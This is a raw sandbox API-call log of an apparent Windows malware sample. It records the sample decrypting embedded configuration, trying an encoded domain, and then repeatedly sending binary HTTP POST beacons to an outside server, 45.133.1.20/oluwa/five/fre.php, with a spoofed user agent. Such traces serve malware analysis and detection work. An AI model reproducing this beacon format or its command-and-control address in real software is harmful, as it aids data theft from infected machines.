(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.242] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.243] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.243] GetProcessHeap () returned 0x6a0000 [0244.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0244.243] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.244] GetProcessHeap () returned 0x6a0000 [0244.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.244] GetProcessHeap () returned 0x6a0000 [0244.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.245] GetProcessHeap () returned 0x6a0000 [0244.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0244.245] GetProcessHeap () returned 0x6a0000 [0244.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0244.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0244.267] GetProcessHeap () returned 0x6a0000 [0244.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0244.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.268] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0244.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.272] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.273] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.274] GetProcessHeap () returned 0x6a0000 [0244.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0244.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.275] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0244.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.276] CryptDestroyKey (hKey=0x6ad020) returned 1 [0244.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.277] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0244.277] GetProcessHeap () returned 0x6a0000 [0244.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0244.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.280] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0244.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.284] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0244.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.285] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0244.285] GetProcessHeap () returned 0x6a0000 [0244.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0244.285] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0244.285] GetProcessHeap () returned 0x6a0000 [0244.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0244.285] socket (af=2, type=1, protocol=6) returned 0x7e0 [0244.286] connect (s=0x7e0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0244.311] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0244.311] GetProcessHeap () returned 0x6a0000 [0244.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0244.311] GetProcessHeap () returned 0x6a0000 [0244.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0244.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0244.313] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.313] GetProcessHeap () returned 0x6a0000 [0244.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4c78 [0244.313] GetProcessHeap () returned 0x6a0000 [0244.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0244.315] GetProcessHeap () returned 0x6a0000 [0244.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0244.315] GetProcessHeap () returned 0x6a0000 [0244.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0244.316] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0244.317] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.317] GetProcessHeap () returned 0x6a0000 [0244.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0244.317] GetProcessHeap () returned 0x6a0000 [0244.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0244.318] send (s=0x7e0, buf=0x6bd460*, len=242, flags=0) returned 242 [0244.318] send (s=0x7e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0244.318] GetProcessHeap () returned 0x6a0000 [0244.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0244.318] recv (in: s=0x7e0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0244.397] GetProcessHeap () returned 0x6a0000 [0244.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0244.397] GetProcessHeap () returned 0x6a0000 [0244.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0244.398] GetProcessHeap () returned 0x6a0000 [0244.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4c78 | out: hHeap=0x6a0000) returned 1 [0244.399] GetProcessHeap () returned 0x6a0000 [0244.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0244.399] closesocket (s=0x7e0) returned 0 [0244.415] GetProcessHeap () returned 0x6a0000 [0244.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0244.415] GetProcessHeap () returned 0x6a0000 [0244.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.416] GetProcessHeap () returned 0x6a0000 [0244.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0244.417] GetProcessHeap () returned 0x6a0000 [0244.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1514) returned 0x7e0 [0244.425] Sleep (dwMilliseconds=0xea60) [0244.426] GetProcessHeap () returned 0x6a0000 [0244.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0244.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0244.514] GetProcessHeap () returned 0x6a0000 [0244.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0244.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.559] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0244.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.561] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.562] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.562] GetProcessHeap () returned 0x6a0000 [0244.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0244.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.564] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0244.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.565] CryptDestroyKey (hKey=0x6ad020) returned 1 [0244.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.569] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0244.569] GetProcessHeap () returned 0x6a0000 [0244.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.571] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.572] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.575] GetProcessHeap () returned 0x6a0000 [0244.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0244.575] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.575] GetProcessHeap () returned 0x6a0000 [0244.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.576] GetProcessHeap () returned 0x6a0000 [0244.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.576] GetProcessHeap () returned 0x6a0000 [0244.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0244.578] GetProcessHeap () returned 0x6a0000 [0244.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0244.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0244.595] GetProcessHeap () returned 0x6a0000 [0244.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0244.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.597] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0244.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.598] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.600] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.600] GetProcessHeap () returned 0x6a0000 [0244.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0244.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.643] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0244.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.644] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0244.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.646] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0244.646] GetProcessHeap () returned 0x6a0000 [0244.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0244.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.648] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0244.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.650] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0244.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0244.651] GetProcessHeap () returned 0x6a0000 [0244.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0244.651] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0244.651] GetProcessHeap () returned 0x6a0000 [0244.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0244.651] socket (af=2, type=1, protocol=6) returned 0x7e4 [0244.651] connect (s=0x7e4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0244.674] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0244.674] GetProcessHeap () returned 0x6a0000 [0244.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0244.674] GetProcessHeap () returned 0x6a0000 [0244.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0244.675] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0244.676] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.676] GetProcessHeap () returned 0x6a0000 [0244.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4df8 [0244.676] GetProcessHeap () returned 0x6a0000 [0244.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0244.679] GetProcessHeap () returned 0x6a0000 [0244.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0244.679] GetProcessHeap () returned 0x6a0000 [0244.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0244.681] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0244.682] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.682] GetProcessHeap () returned 0x6a0000 [0244.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0244.683] GetProcessHeap () returned 0x6a0000 [0244.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0244.683] send (s=0x7e4, buf=0x6bd460*, len=242, flags=0) returned 242 [0244.685] send (s=0x7e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0244.685] GetProcessHeap () returned 0x6a0000 [0244.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0244.685] recv (in: s=0x7e4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0244.756] GetProcessHeap () returned 0x6a0000 [0244.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0244.757] GetProcessHeap () returned 0x6a0000 [0244.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0244.757] GetProcessHeap () returned 0x6a0000 [0244.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4df8 | out: hHeap=0x6a0000) returned 1 [0244.758] GetProcessHeap () returned 0x6a0000 [0244.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0244.758] closesocket (s=0x7e4) returned 0 [0244.759] GetProcessHeap () returned 0x6a0000 [0244.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0244.759] GetProcessHeap () returned 0x6a0000 [0244.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.764] GetProcessHeap () returned 0x6a0000 [0244.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0244.765] GetProcessHeap () returned 0x6a0000 [0244.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1518) returned 0x7e4 [0244.769] Sleep (dwMilliseconds=0xea60) [0244.775] GetProcessHeap () returned 0x6a0000 [0244.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0244.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.777] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.926] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0244.935] GetProcessHeap () returned 0x6a0000 [0244.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0244.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.936] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0244.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.937] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.954] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.954] GetProcessHeap () returned 0x6a0000 [0244.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0244.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.955] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0244.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.956] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0244.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.957] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0244.957] GetProcessHeap () returned 0x6a0000 [0244.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.959] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.960] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.961] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.962] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.962] GetProcessHeap () returned 0x6a0000 [0244.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 